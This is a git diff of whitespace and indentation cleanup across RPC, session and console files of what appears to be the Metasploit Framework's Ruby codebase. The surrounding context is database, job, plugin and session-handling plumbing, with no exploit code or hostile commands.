@@ -1176,18 +1176,18 @@ public vuln[:refs] = [] v.refs.each do |r| vuln[:refs] << r.name - end + end ret[:vuln] << vuln end ret end - + def clients(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] clients = [] ret = {} @@ -1201,7 +1201,7 @@ public hosts.each do |h| cret = nil - if opts[:ua_name] or opts[:ua_ver] + if opts[:ua_name] or opts[:ua_ver] conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver] @@ -1231,7 +1231,7 @@ public raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] clients = [] @@ -1243,7 +1243,7 @@ public hosts.each do |h| cret = nil - if opts[:ua_name] or opts[:ua_ver] + if opts[:ua_name] or opts[:ua_ver] conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver] @@ -1262,11 +1262,11 @@ public dent[:address] = c.host.address.to_s dent[:ua_string] = c.ua_string deleted << dent - c.destroy + c.destroy end - return { :result => 'success', :deleted => deleted } - + return { :result => 'success', :deleted => deleted } + end def driver(token,xopts) @@ -1300,7 +1300,7 @@ public return { :result => 'failed' } end end - + driver = @framework.db.driver case driver @@ -1309,12 +1309,12 @@ public else return { :result => 'failed' } end - - if (not @framework.db.connect(opts)) + + if (not @framework.db.connect(opts)) return { :result => 'failed' } end return { :result => 'success' } - + end def status(token) 
@@ -1323,19 +1323,19 @@ public return {:driver => 'None' } end cdb = "" - if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? - if ActiveRecord::Base.connection.respond_to? :current_database - cdb = ActiveRecord::Base.connection.current_database - else - cdb = ActiveRecord::Base.connection.instance_variable_get(:@config)[:database] - end - return {:driver => @framework.db.driver.to_s , :db => cdb } + if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? + if ActiveRecord::Base.connection.respond_to? :current_database + cdb = ActiveRecord::Base.connection.current_database + else + cdb = ActiveRecord::Base.connection.instance_variable_get(:@config)[:database] + end + return {:driver => @framework.db.driver.to_s , :db => cdb } else return {:driver => @framework.db.driver.to_s} end return {:driver => 'None' } end - + def disconnect(token) authenticate(token) if (@framework.db) diff --git a/lib/msf/core/rpc/job.rb b/lib/msf/core/rpc/job.rb index 2d0cb90de4..ce3250f809 100644 --- a/lib/msf/core/rpc/job.rb +++ b/lib/msf/core/rpc/job.rb @@ -7,11 +7,11 @@ class Job < Base res = {} res['jobs'] = {} @framework.jobs.each do |j| - res['jobs'][j[0]] = j[1].name + res['jobs'][j[0]] = j[1].name end res end - + def stop(token,jid) authenticate(token) obj = @framework.jobs[jid.to_s] @@ -33,7 +33,7 @@ class Job < Base "name" => obj.name, "start_time" => obj.start_time.to_i } - if obj.ctx && obj.ctx[0] + if obj.ctx && obj.ctx[0] if obj.ctx[0].respond_to?(:get_resource) info['uripath'] = obj.ctx[0].get_resource end diff --git a/lib/msf/core/rpc/module.rb b/lib/msf/core/rpc/module.rb index 8c74afab9d..8c5fe208e5 100644 --- a/lib/msf/core/rpc/module.rb +++ b/lib/msf/core/rpc/module.rb 
@@ -216,7 +216,7 @@ class Module < Base :template_path => options['exedir'] } - # If we were given addshellcode for a win32 payload, + # If we were given addshellcode for a win32 payload, # create a double-payload; one running in one thread, one running in the other if options['addshellcode'] buf = Msf::Util::EXE.win32_rwx_exec_thread(buf,0,'end') diff --git a/lib/msf/core/rpc/plugin.rb b/lib/msf/core/rpc/plugin.rb index d9f6f76571..0c09eba1ea 100644 --- a/lib/msf/core/rpc/plugin.rb +++ b/lib/msf/core/rpc/plugin.rb @@ -32,7 +32,7 @@ class Plugin < Base elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", src = 'core', level = 0, from = caller) return { "result" => "failure" } end - + end def unload(token,name) @@ -57,7 +57,7 @@ class Plugin < Base end ret end - + end end end diff --git a/lib/msf/core/rpc/service.rb b/lib/msf/core/rpc/service.rb index 01c1fb0aa5..7647d677cb 100644 --- a/lib/msf/core/rpc/service.rb +++ b/lib/msf/core/rpc/service.rb @@ -9,25 +9,25 @@ module RPC module MonkeyPatcher def initialize(*args) - + # Enable Bigint processing (required for big file sizes,etc) if XMLRPC::Config.const_defined?(:ENABLE_BIGINT) XMLRPC::Config.send(:remove_const, :ENABLE_BIGINT) XMLRPC::Config.const_set(:ENABLE_BIGINT, true) end - + # Enable nils in requests if XMLRPC::Config.const_defined?(:ENABLE_NIL_CREATE) XMLRPC::Config.send(:remove_const, :ENABLE_NIL_CREATE) XMLRPC::Config.const_set(:ENABLE_NIL_CREATE, true) end - + # Enable nils in replies if XMLRPC::Config.const_defined?(:ENABLE_NIL_PARSER) XMLRPC::Config.send(:remove_const, :ENABLE_NIL_PARSER) - XMLRPC::Config.const_set(:ENABLE_NIL_PARSER, true) + XMLRPC::Config.const_set(:ENABLE_NIL_PARSER, true) end - + super(*args) end end 
@@ -35,14 +35,14 @@ end class Service < ::XMLRPC::BasicServer include MonkeyPatcher
-
+
 attr_accessor :service, :state, :on_input, :on_output, :on_error attr_accessor :dispatcher_timeout def initialize(srvhost, srvport, ssl=false, cert=nil, ckey=nil)
-
+
 self.dispatcher_timeout = 0
-
+
 self.service = Rex::Socket::TcpServer.create( 'LocalHost' => srvhost, 'LocalPort' => srvport,
@@ -52,7 +52,7 @@ class Service < ::XMLRPC::BasicServer self.service.on_client_connect_proc = Proc.new { |client| on_client_connect(client) }
- self.service.on_client_data_proc = Proc.new { |client|
+ self.service.on_client_data_proc = Proc.new { |client|
 begin Timeout.timeout(self.dispatcher_timeout) do on_client_data(client)
@@ -143,7 +143,7 @@ end class WebService < ::XMLRPC::BasicServer include MonkeyPatcher
-
+
 attr_accessor :service, :state, :srvhost, :srvport, :uri
diff --git a/lib/msf/core/rpc/session.rb b/lib/msf/core/rpc/session.rb
index 668104f3ac..7dac89222c 100644
--- a/lib/msf/core/rpc/session.rb
+++ b/lib/msf/core/rpc/session.rb
@@ -50,7 +50,7 @@ class Session < Base # session possible, regardless of position in the stream) def shell_read(token, sid, ptr=nil) _valid_session(token,sid,"shell")
- # @session_sequence tracks the pointer into the ring buffer
+ # @session_sequence tracks the pointer into the ring buffer
 # data of sessions (by sid) in order to emulate the old behavior # of shell_read @session_sequence ||= {}
@@ -96,7 +96,7 @@ class Session < Base rescue ::Exception => e raise ::XMLRPC::FaultException.new(500, "session disconnected: #{e.class} #{e}") end
- end
+ end
 def ring_put(token, sid, data) authenticate(token)
@@ -113,7 +113,7 @@ class Session < Base def ring_last(token, sid) authenticate(token) s = _valid_session(token,sid,"ring")
- { "seq" => s.ring.last_sequence.to_s }
+ { "seq" => s.ring.last_sequence.to_s }
 end def ring_clear(token, sid)
@@ -138,7 +138,7 @@ class Session < Base end buff = Rex::Text.decode_base64(data)
-
+
 interacting = false s.channels.each_value do |ch| interacting ||= ch.respond_to?('interacting') && ch.interacting
@@ -207,7 +207,7 @@ class Session < Base end ret end
-
+
 private def _find_module(mtype,mname)
diff --git a/lib/msf/core/rpc/v10/constants.rb b/lib/msf/core/rpc/v10/constants.rb
index 8e5f239009..6aab513f07 100644
--- a/lib/msf/core/rpc/v10/constants.rb
+++ b/lib/msf/core/rpc/v10/constants.rb
@@ -6,7 +6,7 @@ API_VERSION = "1.0" class Exception < RuntimeError attr_accessor :code, :message
-
+
 def initialize(code, message) self.code = code self.message = message
@@ -16,14 +16,14 @@ end class ServerException < RuntimeError attr_accessor :code, :error_message, :error_class, :error_backtrace
-
+
 def initialize(code, error_message, error_class, error_backtrace) self.code = code self.error_message = error_message self.error_class = error_class self.error_backtrace = error_backtrace end
-
+
 def to_s "#{self.error_class} #{self.error_message} #{self.error_backtrace}" end
diff --git a/lib/msf/core/rpc/v10/rpc_auth.rb b/lib/msf/core/rpc/v10/rpc_auth.rb
index 4b600d34de..1eca083291 100644
--- a/lib/msf/core/rpc/v10/rpc_auth.rb
+++ b/lib/msf/core/rpc/v10/rpc_auth.rb
@@ -22,12 +22,12 @@ end end fail = db_validate_auth(user,pass) if fail
-
+
 if fail # Introduce a random delay in the response to annoy brute forcers delay = [ ( rand(3000) / 1000.0 ), 0.50 ].max ::IO.select(nil, nil, nil, delay)
-
+
 # Send back a 401 denied error error(401, "Login Failed") end
diff --git a/lib/msf/core/rpc/v10/rpc_base.rb b/lib/msf/core/rpc/v10/rpc_base.rb
index ac6f006c5c..2f90631195 100644
--- a/lib/msf/core/rpc/v10/rpc_base.rb
+++ b/lib/msf/core/rpc/v10/rpc_base.rb
@@ -3,14 +3,14 @@ module RPC class RPC_Base attr_accessor :framework, :service, :tokens, :users
-
+
 def initialize(service) self.service = service self.framework = service.framework self.tokens = service.tokens
- self.users = service.users
+ self.users = service.users
 end
-
+
 def error(code, message) raise Msf::RPC::Exception.new(code, message) end
diff --git a/lib/msf/core/rpc/v10/rpc_console.rb b/lib/msf/core/rpc/v10/rpc_console.rb
index ebd603a3d7..78d1f5a8ea 100644
--- a/lib/msf/core/rpc/v10/rpc_console.rb
+++ b/lib/msf/core/rpc/v10/rpc_console.rb
@@ -46,7 +46,7 @@ class RPC_Console < RPC_Base "data" => @console_driver.read_console(cid) || '', "prompt" => @console_driver.consoles[cid].prompt || '', "busy" => @console_driver.consoles[cid].busy || false
- }
+ }
 end def rpc_write(cid, data)
@@ -56,20 +56,20 @@ class RPC_Console < RPC_Base end def rpc_tabs(cid, line)
- cid = cid.to_s
+ cid = cid.to_s
 return { 'result' => 'failure' } if not @console_driver.consoles[cid] { "tabs" => @console_driver.consoles[cid].tab_complete(line) } end def rpc_session_kill(cid)
- cid = cid.to_s
+ cid = cid.to_s
 return { 'result' => 'failure' } if not @console_driver.consoles[cid] @console_driver.consoles[cid].session_kill { 'result' => 'success' } end def rpc_session_detach(cid)
- cid = cid.to_s
+ cid = cid.to_s
 return { 'result' => 'failure' } if not @console_driver.consoles[cid] @console_driver.consoles[cid].session_detach { 'result' => 'success' }
diff --git a/lib/msf/core/rpc/v10/rpc_core.rb b/lib/msf/core/rpc/v10/rpc_core.rb
index 39d857564c..e98783657d 100644
--- a/lib/msf/core/rpc/v10/rpc_core.rb
+++ b/lib/msf/core/rpc/v10/rpc_core.rb
@@ -4,64 +4,64 @@ class RPC_Core < RPC_Base def rpc_version {
- "version" => ::Msf::Framework::Version,
+ "version" => ::Msf::Framework::Version,
 "ruby" => "#{RUBY_VERSION} #{RUBY_PLATFORM} #{RUBY_RELEASE_DATE}",
- "api" => API_VERSION
+ "api" => API_VERSION
 } end
-
+
 def rpc_stop self.service.stop end
-
+
 def rpc_setg(var, val) framework.datastore[var] = val { "result" => "success" } end
-
+
 def rpc_unsetg(var) framework.datastore.delete(var) { "result" => "success" } end
-
+
 def rpc_save framework.save_config { "result" => "success" } end
-
+
 def rpc_reload_modules framework.modules.reload_modules rpc_module_stats() end
-
+
 def rpc_add_module_path(path) framework.modules.add_module_path(path, false) rpc_module_stats() end
-
+
 def rpc_module_stats
- {
+ {
 'exploits' => framework.stats.num_exploits, 'auxiliary' => framework.stats.num_auxiliary, 'post' => framework.stats.num_post, 'encoders' => framework.stats.num_encoders, 'nops' => framework.stats.num_nops,
- 'payloads' => framework.stats.num_payloads
+ 'payloads' => framework.stats.num_payloads
 } end
-
+
 def rpc_thread_list res = {} framework.threads.each_index do |i| t = framework.threads[i] next if not t
- res[i] = {
+ res[i] = {
 :status => (t.status || "dead"), :critical => t[:tm_crit] ? true : false, :name => t[:tm_name].to_s, :started => t[:tm_time].to_s
- }
- end
+ }
+ end
 res end
@@ -69,7 +69,7 @@ class RPC_Core < RPC_Base framework.threads.kill(tid.to_i) rescue nil { "result" => "success" } end
-
+
 end end end
diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb
index e904a44808..9da4932529 100644
--- a/lib/msf/core/rpc/v10/rpc_db.rb
+++ b/lib/msf/core/rpc/v10/rpc_db.rb
@@ -3,12 +3,12 @@ module RPC class RPC_Db < RPC_Base private
- def db
+ def db
 self.framework.db.active end def find_workspace(wspace = nil)
- if(wspace and wspace != "")
+ if(wspace and wspace != "")
 return self.framework.db.find_workspace(wspace) || error(500, "Invalid workspace") end self.framework.db.workspace
@@ -23,7 +23,7 @@ private end def opts_to_hosts(opts)
- wspace = find_workspace(opts[:workspace])
+ wspace = find_workspace(opts[:workspace])
 hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address]
@@ -42,7 +42,7 @@ private end def opts_to_services(hosts,opts)
- wspace = find_workspace(opts[:workspace])
+ wspace = find_workspace(opts[:workspace])
 services = [] if opts[:host] or opts[:address] or opts[:addresses] return services if hosts.count < 1
@@ -69,7 +69,7 @@ private end return services end
-
+
 def db_check error(500, "Database Not Loaded") if not db end
@@ -95,7 +95,7 @@ public ret = {} ret[:hosts] = []
- wspace.hosts.all(:conditions => conditions, :order => :address,
+ wspace.hosts.all(:conditions => conditions, :order => :address,
 :limit => limit, :offset => offset).each do |h| host = {} host[:created_at] = h.created_at.to_i
@@ -164,7 +164,7 @@ public wspace.vulns.all(:include => :service, :conditions => conditions, :limit => limit, :offset => offset).each do |v| vuln = {} reflist = v.refs.map { |r| r.name }
- if(v.service)
+ if(v.service)
 vuln[:port] = v.service.port vuln[:proto] = v.service.proto else
@@ -172,7 +172,7 @@ public vuln[:proto] = nil end vuln[:time] = v.created_at.to_i
- vuln[:host] = v.host.address || v.host.address6 || nil
+ vuln[:host] = v.host.address || v.host.address6 || nil
 vuln[:name] = v.name vuln[:refs] = reflist.join(',') ret[:vulns] << vuln
@@ -252,7 +252,7 @@ public def rpc_get_host(xopts) opts, wspace = init_db_opts_workspace(xopts)
-
+
 ret = {} ret[:host] = [] opts = fix_options(xopts)
@@ -274,7 +274,7 @@ public host[:info] = h.info.to_s ret[:host] << host end
- ret
+ ret
 end def rpc_report_host(xopts)
@@ -283,7 +283,7 @@ public res = self.framework.db.report_host(opts) return { :result => 'success' } if(res) { :result => 'failed' }
-
+
 end def rpc_report_service(xopts)
@@ -320,7 +320,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array
-
+
 services.each do |s| service = {} host = s.host
@@ -423,7 +423,7 @@ public service = host.services.find_by_proto_and_port(opts[:proto],opts[:port]) if host.services.count > 0 opts[:service] = service if service end
-
+
 res = self.framework.db.report_note(opts) return { :result => 'success' } if(res) { :result => 'failed' }
@@ -443,7 +443,7 @@ public ret = {} ret[:notes] = []
- wspace.notes.all(:include => [:host, :service], :conditions => conditions,
+ wspace.notes.all(:include => [:host, :service], :conditions => conditions,
 :limit => limit, :offset => offset).each do |n| note = {} note[:time] = n.created_at.to_i
@@ -475,7 +475,7 @@ public i.each do |k,v| info[k.to_sym] = v end
- ret[:auth_info] << info
+ ret[:auth_info] << info
 end ret end
@@ -490,7 +490,7 @@ public hosts = [] services = [] vulns = []
-
+
 if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end
@@ -546,10 +546,10 @@ public dent[:proto] = v.service.proto if v.service dent[:name] = v.name deleted << dent
- v.destroy
+ v.destroy
 end
-
- return { :result => 'success', :deleted => deleted }
+
+ return { :result => 'success', :deleted => deleted }
 end def rpc_del_note(xopts)
@@ -557,7 +557,7 @@ public hosts = [] services = [] notes = []
-
+
 if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end
@@ -612,10 +612,10 @@ public dent[:proto] = n.service.proto if n.service dent[:ntype] = n.ntype deleted << dent
- n.destroy
+ n.destroy
 end
-
- return { :result => 'success', :deleted => deleted }
+
+ return { :result => 'success', :deleted => deleted }
 end def rpc_del_service(xopts)
@@ -658,7 +658,7 @@ public services << sret if sret and sret.class == Msf::DBManager::Service services |= sret if sret and sret.class == Array end
-
+
 deleted = [] services.each do |s| dent = {}
@@ -666,16 +666,16 @@ public dent[:port] = s.port dent[:proto] = s.proto deleted << dent
- s.destroy
+ s.destroy
 end
-
- return { :result => 'success', :deleted => deleted }
+
+ return { :result => 'success', :deleted => deleted }
 end def rpc_del_host(xopts) db_check opts = fix_options(xopts)
- wspace = find_workspace(opts[:workspace])
+ wspace = find_workspace(opts[:workspace])
 hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address]
@@ -693,10 +693,10 @@ public deleted = [] hosts.each do |h| deleted << h.address.to_s
- h.destroy
+ h.destroy
 end
-
- return { :result => 'success', :deleted => deleted }
+
+ return { :result => 'success', :deleted => deleted }
 end def rpc_report_vuln(xopts)
@@ -722,14 +722,14 @@ public event[:created_at] = e.created_at.to_i event[:updated_at] = e.updated_at.to_i event[:name] = e.name
- event[:critical] = e.critical if(e.critical)
- event[:username] = e.username if(e.username)
+ event[:critical] = e.critical if(e.critical)
+ event[:username] = e.username if(e.username)
 event[:info] = e.info ret[:events] << event end ret end
-
+
 def rpc_report_event(xopts) opts, wspace = init_db_opts_workspace(xopts) res = self.framework.db.report_event(opts)
@@ -778,7 +778,7 @@ public return { :result => 'success' } if res { :result => 'failed' } end
-
+
 #right now workspace is the only option supported def rpc_creds(xopts) opts, wspace = init_db_opts_workspace(xopts)
@@ -787,7 +787,7 @@ public ret = {} ret[:creds] = []
- DBManager::Cred.find(:all, :include => {:service => :host}, :conditions => ["hosts.workspace_id = ?",
+ DBManager::Cred.find(:all, :include => {:service => :host}, :conditions => ["hosts.workspace_id = ?",
 framework.db.workspace.id ], :limit => limit, :offset => offset).each do |c| cred = {} cred[:host] = c.service.host.address || c.service.host.address6 if(c.service.host)
@@ -803,7 +803,7 @@ public end ret end
-
+
 def rpc_import_data(xopts) opts, wspace = init_db_opts_workspace(xopts) self.framework.db.import(opts)
@@ -827,7 +827,7 @@ public return ret if sret == nil services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array
-
+
 services.each do |s| vulns |= s.vulns end
@@ -836,7 +836,7 @@ public end return ret if (not vulns)
-
+
 vulns.each do |v| vuln= {} host= v.host
@@ -852,12 +852,12 @@ public vuln[:refs] = [] v.refs.each do |r| vuln[:refs] << r.name
- end
+ end
 ret[:vuln] << vuln end ret end
-
+
 def rpc_clients(xopts) opts, wspace = init_db_opts_workspace(xopts) limit = opts.delete(:limit) || 100
@@ -888,7 +888,7 @@ public def rpc_del_client(xopts) db_check opts = fix_options(xopts)
- wspace = find_workspace(opts[:workspace])
+ wspace = find_workspace(opts[:workspace])
 hosts = [] clients = []
@@ -900,7 +900,7 @@ public hosts.each do |h| cret = nil
- if opts[:ua_name] or opts[:ua_ver]
+ if opts[:ua_name] or opts[:ua_ver]
 conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver]
@@ -919,10 +919,10 @@ public dent[:address] = c.host.address.to_s dent[:ua_string] = c.ua_string deleted << dent
- c.destroy
+ c.destroy
 end
- { :result => 'success', :deleted => deleted }
+ { :result => 'success', :deleted => deleted }
 end def rpc_driver(xopts)
@@ -954,7 +954,7 @@ public return { :result => 'failed' } end end
-
+
 driver = self.framework.db.driver case driver
@@ -963,19 +963,19 @@ public else return { :result => 'failed' } end
-
- if (not self.framework.db.connect(opts))
+
+ if (not self.framework.db.connect(opts))
 return { :result => 'failed' } end return { :result => 'success' }
-
+
 end def rpc_status if (not self.framework.db.driver) return {:driver => 'None' } end
-
+
 cdb = "" if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? if ActiveRecord::Base.connection.respond_to? :current_database
@@ -989,7 +989,7 @@ public end {:driver => 'None' } end
-
+
 def rpc_disconnect if (self.framework.db) self.framework.db.disconnect()
diff --git a/lib/msf/core/rpc/v10/rpc_job.rb b/lib/msf/core/rpc/v10/rpc_job.rb
index 80ca4c0c58..7862a81596 100644
--- a/lib/msf/core/rpc/v10/rpc_job.rb
+++ b/lib/msf/core/rpc/v10/rpc_job.rb
@@ -5,18 +5,18 @@ class RPC_Job < RPC_Base def rpc_list res = {} self.framework.jobs.each do |j|
- res[j[0]] = j[1].name
+ res[j[0]] = j[1].name
 end res end
-
+
 def rpc_stop(jid) obj = self.framework.jobs[jid.to_s] error(500, "Invalid Job") if not obj obj.stop { "result" => "success" } end
-
+
 def rpc_info(jid) obj = self.framework.jobs[jid.to_s] error(500, "Invalid Job") if not obj
@@ -26,8 +26,8 @@ class RPC_Job < RPC_Base :name => obj.name, :start_time => obj.start_time.to_i }
-
- if obj.ctx && obj.ctx[0]
+
+ if obj.ctx && obj.ctx[0]
 if obj.ctx[0].respond_to?(:get_resource) info[:uripath] = obj.ctx[0].get_resource end
diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb
index 7aedaa64c6..ab44e1e7c1 100644
--- a/lib/msf/core/rpc/v10/rpc_module.rb
+++ b/lib/msf/core/rpc/v10/rpc_module.rb
@@ -168,7 +168,7 @@ class RPC_Module < RPC_Base if options['platform'] platform = Msf::Module::PlatformList.transform(options['platform']) end
-
+
 arch = nil if options['arch'] arch = options['arch']
@@ -185,7 +185,7 @@ class RPC_Module < RPC_Base :template_path => options['exedir'] }
- # If we were given addshellcode for a win32 payload,
+ # If we were given addshellcode for a win32 payload,
 # create a double-payload; one running in one thread, one running in the other if options['addshellcode'] buf = Msf::Util::EXE.win32_rwx_exec_thread(buf,0,'end')
@@ -229,7 +229,7 @@ class RPC_Module < RPC_Base private def _find_module(mtype,mname)
-
+
 if mname !~ /^(exploit|payload|nop|encoder|auxiliary|post)\// mname = mtype + "/" + mname end
@@ -275,7 +275,7 @@ private "uuid" => mod.uuid } end
-
+
 def _run_payload(mod, opts) badchars = opts['BadChars'] || '' fmt = opts['Format'] || 'raw'
diff --git a/lib/msf/core/rpc/v10/rpc_plugin.rb b/lib/msf/core/rpc/v10/rpc_plugin.rb
index b2139b419c..e5493e2db2 100644
--- a/lib/msf/core/rpc/v10/rpc_plugin.rb
+++ b/lib/msf/core/rpc/v10/rpc_plugin.rb
@@ -3,7 +3,7 @@ module RPC class RPC_Plugin < RPC_Base def rpc_load(path, xopts = {})
-
+
 opts = {} xopts.each do |k,v|
@@ -31,7 +31,7 @@ class RPC_Plugin < RPC_Base elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", src = 'core', level = 0, from = caller) return { "result" => "failure" } end
-
+
 end def rpc_unload(name)
@@ -54,7 +54,7 @@ class RPC_Plugin < RPC_Base end ret end
-
+
 end end end
diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb
index fb609ac582..6ad8cfe5b3 100644
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -48,7 +48,7 @@ class RPC_Session < RPC_Base # session possible, regardless of position in the stream) def rpc_shell_read( sid, ptr=nil) _valid_session(sid,"shell")
- # @session_sequence tracks the pointer into the ring buffer
+ # @session_sequence tracks the pointer into the ring buffer
 # data of sessions (by sid) in order to emulate the old behavior # of shell_read @session_sequence ||= {}
@@ -93,7 +93,7 @@ class RPC_Session < RPC_Base rescue ::Exception => e error(500, "Session Disconnected: #{e.class} #{e}") end
- end
+ end
 def rpc_ring_put( sid, data) s = _valid_session(sid,"ring")
@@ -107,7 +107,7 @@ class RPC_Session < RPC_Base def rpc_ring_last( sid) s = _valid_session(sid,"ring")
- { "seq" => s.ring.last_sequence.to_s }
+ { "seq" => s.ring.last_sequence.to_s }
 end def rpc_ring_clear( sid)
@@ -193,7 +193,7 @@ class RPC_Session < RPC_Base def rpc_compatible_modules( sid) ret = []
-
+
 mtype = "post" names = self.framework.post.keys.map{ |x| "post/#{x}" } names.each do |mname|
@@ -203,7 +203,7 @@ class RPC_Session < RPC_Base end { "modules" => ret } end
-
+
 private def _find_module(mtype,mname)
@@ -221,7 +221,7 @@ private if(not s) error(500, "Unknown Session ID") end
-
+
 if type == "ring" if not s.respond_to?(:ring) error(500, "Session #{s.type} does not support ring operations")
diff --git a/lib/msf/core/session/basic.rb b/lib/msf/core/session/basic.rb
index e6b877e0b4..369a0f1007 100644
--- a/lib/msf/core/session/basic.rb
+++ b/lib/msf/core/session/basic.rb
@@ -25,7 +25,7 @@ module Basic def type "basic" end
-
+
 protected #
diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb
index b808f2fbdd..ac96fe2f28 100644
--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -95,7 +95,7 @@ module Interactive # The remote stream handle. Must inherit from Rex::IO::Stream. # attr_accessor :rstream
-
+
 # # The RingBuffer object used to allow concurrent access to this session #
diff --git a/lib/msf/core/session/netware_console.rb b/lib/msf/core/session/netware_console.rb
index 4fda1de360..8372a2a748 100644
--- a/lib/msf/core/session/netware_console.rb
+++ b/lib/msf/core/session/netware_console.rb
@@ -4,15 +4,15 @@ module Msf module Sessions ###
-#
+#
 # This class provides basic interaction with a command shell on the remote # endpoint. This session is initialized with a stream that will be used # as the pipe for reading and writing the command shell. # ### class NetwareConsole
-
- #
+
+ #
 # This interface supports basic interaction. # include Msf::Session::Basic
@@ -73,28 +73,28 @@ class NetwareConsole def _stream_read_remote_write_local(stream) buf = stream.get
- bsize = 25 * 80 +8
+ bsize = 25 * 80 +8
- while buf.length > 0
- data = buf[0, bsize]
+ while buf.length > 0
+ data = buf[0, bsize]
- user_output.print("\e[24A")
+ user_output.print("\e[24A")
- for i in 0..24
- user_output.print(data[8+i*80, 80] + "\n")
- end
+ for i in 0..24
+ user_output.print(data[8+i*80, 80] + "\n")
+ end
- col = data[4, 2].unpack('v')[0]
- line = 25-data[6, 2].unpack('v')[0]
- user_output.print("\e[#{line}A")
- user_output.print("\e[#{col}C")
+ col = data[4, 2].unpack('v')[0]
+ line = 25-data[6, 2].unpack('v')[0]
+ user_output.print("\e[#{line}A")
+ user_output.print("\e[#{col}C")
- if (buf.length == bsize)
- buf = ''
- else
- buf = buf[bsize, buf.length]
- end
- end
+ if (buf.length == bsize)
+ buf = ''
+ else
+ buf = buf[bsize, buf.length]
+ end
+ end
 end end
diff --git a/lib/msf/core/session/provider/multi_command_shell.rb b/lib/msf/core/session/provider/multi_command_shell.rb
index 4cdde3de9d..1f8369dc67 100644
--- a/lib/msf/core/session/provider/multi_command_shell.rb
+++ b/lib/msf/core/session/provider/multi_command_shell.rb
@@ -15,7 +15,7 @@ module MultiCommandShell include SingleCommandShell #
- # Initializes the default command shell as expected from
+ # Initializes the default command shell as expected from
 # SingleCommandShell. # def shell_init()
diff --git a/lib/msf/core/task_manager.rb b/lib/msf/core/task_manager.rb
index aa5fb13d8e..6c2db60e35 100644
--- a/lib/msf/core/task_manager.rb
+++ b/lib/msf/core/task_manager.rb
@@ -77,7 +77,7 @@ class TaskManager # # Add a new task to the queue unless we are called
- # by the queue thread itself.
+ # by the queue thread itself.
 # def queue_task(task) if Thread.current[:task_manager]
@@ -128,10 +128,10 @@ class TaskManager retry end end
-
+
 # Mark this thread as the task manager self.thread[:task_manager] = true
-
+
 # Return the thread object to the caller self.thread end
diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb
index ef9fd3ded5..9fb1741043 100644
--- a/lib/msf/ui/console/command_dispatcher.rb
+++ b/lib/msf/ui/console/command_dispatcher.rb
@@ -84,9 +84,9 @@ module CommandDispatcher # attr_accessor :driver
-end
+end
 end end end
-
+
 require 'msf/ui/console/module_command_dispatcher' require 'msf/ui/console/command_dispatcher/core'
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index 2141745911..941c8acfdb 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1138,7 +1138,7 @@ class Db save = false if args.include?("save")
- save = active?
+ save = active?
 args.delete("save") end
diff --git a/lib/msf/ui/console/command_dispatcher/nop.rb b/lib/msf/ui/console/command_dispatcher/nop.rb
index aa54d1ae7e..9f5d66e113 100644
--- a/lib/msf/ui/console/command_dispatcher/nop.rb
+++ b/lib/msf/ui/console/command_dispatcher/nop.rb
@@ -55,7 +55,7 @@ class Nop @@generate_opts.parse(args) { |opt, idx, val| case opt when nil
- length = val.to_i
+ length = val.to_i
 when '-b' badchars = Rex::Text.hex_to_raw(val) when "-c"
diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb
index 2c519ff6ea..dd1430db7e 100644
--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -40,7 +40,7 @@ class Payload # def commands super.update({
- "generate" => "Generates a payload",
+ "generate" => "Generates a payload",
 }) end
@@ -68,7 +68,7 @@ class Payload template = nil plat = nil keep = false
-
+
 @@generate_opts.parse(args) { |opt, idx, val| case opt when '-b'
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 1c47a7b2d3..25e7701eda 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -213,60 +213,60 @@ class Driver < Msf::Ui::Driver load_resource(opts['Resource']) end end
-
+
 # # Configure a default output path for jUnit XML output # def junit_setup(output_path) output_path = ::File.expand_path(output_path)
-
+
 ::FileUtils.mkdir_p(output_path) @junit_output_path = output_path @junit_error_count = 0 print_status("Test Output: #{output_path}") end
-
+
 # # Emit a new jUnit XML output file representing an error # def junit_error(tname, ftype, data = nil)
-
+
